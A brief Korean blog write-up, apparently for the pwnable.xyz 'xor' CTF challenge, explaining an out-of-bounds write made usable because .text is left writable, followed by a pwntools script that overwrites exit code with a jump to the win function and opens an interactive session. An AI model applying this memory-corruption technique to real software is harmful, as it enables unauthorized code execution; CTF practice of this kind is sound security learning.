oob가 터진다
oob가 가능하더라도 FULL RELRO가 걸려있어서 뭘 할 수가 없다
바이너리 보니까 mprotect가 왜 있나 싶었는데 .text영역에 rwx를 다준다
oob로 exit쪽 코드를 jmp win으로 수정해줬다
from pwn import *
#p = remote("svc.pwnable.xyz", 30029)
p = process("./xor")
jump = -262887
def aaw(idx, data):
p.recvuntil(" ")
p.send(str(data ^ 1))
p.send(b" 1 ")
p.sendline(str(idx))
aaw(jump, 0x458b48ffffff58e9)
aaw(0, 0)
p.interactive()
'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / TLSv00 (0) | 2022.05.11 |
|---|---|
| pwnable.xyz / free spirit (0) | 2022.05.10 |
| pwnable.xyz / two_target (0) | 2022.05.07 |
| pwnable.xyz / note (0) | 2022.05.06 |
| pwnable.xyz/GrownUp (0) | 2022.02.14 |
